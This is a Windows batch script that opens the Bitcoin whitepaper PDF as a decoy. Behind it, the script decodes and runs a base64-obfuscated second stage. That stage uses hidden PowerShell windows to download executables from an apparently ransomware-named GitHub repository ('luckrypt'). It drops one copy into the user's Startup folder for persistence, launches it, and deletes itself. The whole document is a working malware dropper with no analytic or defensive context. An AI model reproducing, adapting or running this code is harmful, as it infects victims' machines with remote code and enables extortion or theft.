@echo off
powershell.exe -WindowStyle hidden wget https://bitcoin.org/bitcoin.pdf -OutFile %TEMP%\bitcoin.pdf
start /max %temp%\bitcoin.pdf
set "ZW5jb2RlZF9wYXlsb2Fk=QGVjaG8gb2ZmCnNldGxvY2FsCgpzZXQgImE9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3N0eXh6Ni9sdWNrcnlwdC9tYWluL21haW4uZXhlIgpzZXQgImI9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3N0eXh6Ni9sdWNrcnlwdC9tYWluL2RlY3J5cHQuZXhlIgoKc2V0ICJjPSVVU0VSUFJPRklMRSVcQXBwRGF0YVxMb2NhbFxUZW1wIgpzZXQgImQ9JVVTRVJQUk9GSUxFJVxBcHBEYXRhXFJvYW1pbmdcTWljcm9zb2Z0XFdpbmRvd3NcU3RhcnQgTWVudVxQcm9ncmFtc1xTdGFydHVwIgoKc2V0ICJlPW1haW4uZXhlIgpzZXQgImY9dXBkYXRlLmV4ZSIKCmlmIG5vdCBleGlzdCAiJWMlIiBta2RpciAiJWMlIgoKcG93ZXJzaGVsbCAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJyViJScsICclZCVcJWYlJykiCnBvd2Vyc2hlbGwgLXdpbmRvd3N0eWxlIGhpZGRlbiAtY29tbWFuZCAiKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCclYSUnLCAnJWMlXCVlJScpIgoKaWYgbm90IGV4aXN0ICIlZCVcJWYlIiAoCiAgICBleGl0IC9iCikKCmlmIG5vdCBleGlzdCAiJWMlXCVlJSIgKAogICAgZXhpdCAvYgopCgpjZCAvZCAiJWQlIgpzdGFydCAiIiAiJWQlXCVmJSIKCmNkIC9kICIlYyUiCgp0YXNrbGlzdCAvZmkgImltYWdlbmFtZSBlcSAlZSUiIDI+TlVMIHwgZmluZCAvaSAiJWUlIiA+TlVMCmlmICVlcnJvcmxldmVsJSBuZXEgMCAoCiAgICAiJWMlXCVlJSIKKSBlbHNlICgKICAgIGVjaG8gTWFpbi5leGUgaXMgYWxyZWFkeSBydW5uaW5nLiBTa2lwcGluZyBleGVjdXRpb24uCikKCmVuZGxvY2FsCmRlbCAiJX5mMCI="
set "ZGVjb2RlZF9wYXlsb2Fk=%temp%\cG9sbHV4bmV0.bat"
(
    echo %ZW5jb2RlZF9wYXlsb2Fk% | powershell -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($input))"
) > %ZGVjb2RlZF9wYXlsb2Fk%

call %ZGVjb2RlZF9wYXlsb2Fk%